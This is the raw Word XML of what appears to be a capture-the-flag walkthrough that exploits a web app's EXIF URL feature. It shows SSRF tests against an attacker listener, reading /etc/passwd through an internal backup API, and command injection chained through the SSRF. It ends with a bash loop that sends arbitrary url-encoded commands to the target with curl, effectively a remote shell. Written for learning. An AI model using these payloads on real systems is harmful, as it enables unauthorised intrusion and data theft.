        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then in the URL feature, we try and connect to the </w:t>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:t>listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F7E62" w14:textId="1FB1EC8A" w:rsidR="00B33EDA" w:rsidRDefault="00B33EDA" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00C4518E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://$attacking_ip:80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="597AB5F7" w14:textId="07CC2F85" w:rsidR="00B33EDA" w:rsidRDefault="00B33EDA" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F47BC6F" w14:textId="0F610643" w:rsidR="00B33EDA" w:rsidRDefault="00B33EDA" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We get a connection back. Great looks like we do have a SSRF vulnerability. We run another test </w:t>
      </w:r>
      <w:r w:rsidR="00A4757E">
        <w:t>to see</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if there are </w:t>
      </w:r>
      <w:r w:rsidR="00A4757E">
        <w:t xml:space="preserve">indeed </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">any security measures in place. </w:t>
      </w:r>
      <w:r w:rsidR="00A4757E">
        <w:t>This time we set up our listener on port 8000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183A02D2" w14:textId="0C721BDD" w:rsidR="00A4757E" w:rsidRPr="00952D19" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D3A59" w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c -lnvp 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBC0509" w14:textId="0119D369" w:rsidR="00A4757E" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8789E0" w14:textId="40C4B872" w:rsidR="00A4757E" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A connection was received back, meaning no outbound connections are being blocked. We run our final </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>test,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can we fetch a file? This time we use the HTTP schema. We open create</w:t>
      </w:r>
      <w:r w:rsidR="000B3846">
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a random text file and open up a python HTTP server on our machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25801860" w14:textId="69B8C83A" w:rsidR="00A4757E" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E65AB2" w14:textId="37A1E689" w:rsidR="00A4757E" w:rsidRPr="00952D19" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ython3 -m </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C714295" w14:textId="77777777" w:rsidR="00A4757E" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6696C7B3" w14:textId="5D79C75B" w:rsidR="00A4757E" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>We fetch our file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E1CA26" w14:textId="4189B72E" w:rsidR="00A4757E" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45392D" w14:textId="373780A2" w:rsidR="00A4757E" w:rsidRPr="00952D19" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://$attacking_ip:8000/$random_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE72E6" w14:textId="30675F62" w:rsidR="00A4757E" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C30626" w14:textId="494116CE" w:rsidR="00A4757E" w:rsidRDefault="00A4757E" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No connection was made back for some reason. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> see if there is any application listening on the server. We know the file request format </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C4518E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://$ip_address_docker/api/exif?url=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> We can abuse this by specifying the localhost IP and brute forcing port numbers in order to </w:t>
      </w:r>
      <w:r w:rsidR="000B3846">
        <w:t>find listening services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6114BB18" w14:textId="735A74E3" w:rsidR="004D675C" w:rsidRDefault="004D675C" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70431B41" w14:textId="4A2A0A07" w:rsidR="004D675C" w:rsidRDefault="004D675C" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burpe Suite of Ffuf can be used for this. We only find the </w:t>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> listening on port 8080. Nothing more we can do hear. We take another </w:t>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:t>lo</w:t>
      </w:r>
      <w:r w:rsidR="00D86B32">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the robots.txt file. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">bak.txt file may mean that </w:t>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:t>there</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a backup for one of the pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16628B14" w14:textId="77777777" w:rsidR="007101C0" w:rsidRDefault="007101C0" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFF4D21" w14:textId="67519F45" w:rsidR="004D675C" w:rsidRDefault="004D675C" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/api.bak.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C8B3DB" w14:textId="6FA3E04C" w:rsidR="004D675C" w:rsidRDefault="004D675C" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exif-util.bak.txt  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Bingo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0C010" w14:textId="6CE5F3E4" w:rsidR="004D675C" w:rsidRDefault="004D675C" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/login.bak.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA522F" w14:textId="5D7E2CCB" w:rsidR="004D675C" w:rsidRDefault="004D675C" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t>index.bak.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C89603B" w14:textId="77777777" w:rsidR="007101C0" w:rsidRDefault="007101C0" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71510C99" w14:textId="59EB542E" w:rsidR="004D675C" w:rsidRDefault="004D675C" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>We find a reference to an internal app</w:t>
      </w:r>
      <w:r w:rsidR="00201F73">
        <w:t xml:space="preserve"> along with its port</w:t>
      </w:r>
      <w:r>
        <w:t>; let</w:t>
      </w:r>
      <w:r w:rsidR="00201F73">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s see if we can reach it</w:t>
      </w:r>
      <w:r w:rsidR="00201F73">
        <w:t xml:space="preserve">. We assume as it’s a backup of the </w:t>
      </w:r>
      <w:r w:rsidR="00F304F6">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00201F73">
        <w:t xml:space="preserve"> in use, it will follow the same URL format</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C429F78" w14:textId="77777777" w:rsidR="007101C0" w:rsidRPr="008353D4" w:rsidRDefault="007101C0" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4555E77E" w14:textId="6FCA025B" w:rsidR="00352F45" w:rsidRPr="00952D19" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00952D19" w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://$ip_address/api/exif?url=http://api-dev-backup:8080/exif?url=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A196691" w14:textId="1AEFC145" w:rsidR="007101C0" w:rsidRDefault="007101C0" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD6462F" w14:textId="20AEE469" w:rsidR="007101C0" w:rsidRDefault="00201F73" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>It l</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t>ooks like there is some sort of filter that is in place. Let</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00952D19">
        <w:t xml:space="preserve">carry out another </w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t xml:space="preserve">test for </w:t>
      </w:r>
      <w:r w:rsidR="00952D19">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t>ommand Injection</w:t>
      </w:r>
      <w:r w:rsidR="00952D19">
        <w:t xml:space="preserve"> vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8FCCB" w14:textId="2A669A24" w:rsidR="007101C0" w:rsidRDefault="007101C0" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D34245E" w14:textId="06C29A64" w:rsidR="007101C0" w:rsidRDefault="007101C0" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After testing we find that we can chain together the SSRF with the Command Injection using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79FAEA" w14:textId="77777777" w:rsidR="00952D19" w:rsidRDefault="007101C0" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A992E4" w14:textId="38E0451C" w:rsidR="007101C0" w:rsidRPr="00952D19" w:rsidRDefault="007101C0" w:rsidP="00952D19">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://$ip_address/api/exif?url=http://api-dev-backup:8000/exif?url=;ls%20-la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F3B1F" w14:textId="3EE5647E" w:rsidR="007101C0" w:rsidRDefault="007101C0" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C13B64" w14:textId="28A7AD57" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t>ommand</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s that are multiple characters with spaces </w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t>need to be url</w:t>
      </w:r>
      <w:r w:rsidR="00952D19">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t xml:space="preserve">encoded before being sent. We could </w:t>
      </w:r>
      <w:r w:rsidR="00952D19">
        <w:t>use online tools in order to encode</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t xml:space="preserve"> each request but that will become </w:t>
      </w:r>
      <w:r w:rsidR="00201F73">
        <w:t>incredibly</w:t>
      </w:r>
      <w:r w:rsidR="007101C0">
        <w:t xml:space="preserve"> tedious and we a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">re lazy so time to practice some scripting skills. </w:t>
      </w:r>
      <w:r w:rsidR="00201F73">
        <w:t xml:space="preserve">A useful utility in Linux for url-encoding is </w:t>
      </w:r>
      <w:r w:rsidR="00201F73" w:rsidRPr="00201F73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>urlencode</w:t>
      </w:r>
      <w:r w:rsidR="00201F73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00201F73">
        <w:t>It can be installed via</w:t>
      </w:r>
      <w:r w:rsidR="00EA2B46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA2B46" w:rsidRPr="00EA2B46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>apt install gridsite-clients</w:t>
      </w:r>
      <w:r w:rsidR="00952D19">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00952D19">
        <w:t xml:space="preserve">We’ll use this in order to carry out a bash script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540AEF68" w14:textId="2BF3889C" w:rsidR="00EA2B46" w:rsidRDefault="00EA2B46" w:rsidP="00352F45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D4E762D" wp14:editId="0E085381">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>487680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>102870</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4975860" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1524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58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227B67" w14:textId="1068634B" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>#!/</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>bin/bash</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0FB5EAA6" w14:textId="4E5F112A" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>target=$1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30224523" w14:textId="2DC31121" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="2F74E86B" w14:textId="74991705" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>while [ 1=</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>1 ]</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidR="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t xml:space="preserve">   #creates an infinite loop for the injection process unless cancelled by Ctrl+C</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="055AECB2" w14:textId="49AA35A0" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>do</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="21D829F2" w14:textId="77777777" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="21E1E44A" w14:textId="145EC321" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>echo -e -n “Enter Command: “</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="12708CA7" w14:textId="42DD0694" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>read command</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="345245DD" w14:textId="1DFB21D1" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>encode=$(urlencode $command)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="464D0865" w14:textId="217973D9" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>echo -e “\nEncoded Command: $encoded\n”</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E58FF30" w14:textId="711D5008" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="002E44D1">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>curl -s “http://$target/api/exif?url=http://api-dev-backup:80</w:t>
                            </w:r>
                            <w:r w:rsidR="006517C3">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>8</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>0/exif?url=;$encoded</w:t>
                            </w:r>
                            <w:r w:rsidR="006517C3">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>”</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7E351933" w14:textId="1278C95D" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="002E44D1">
                            <w:pP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color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00952D19">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>done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4E762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.4pt;margin-top:8.1pt;width:391.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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="01227B67" w14:textId="1068634B" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="gramStart"/>
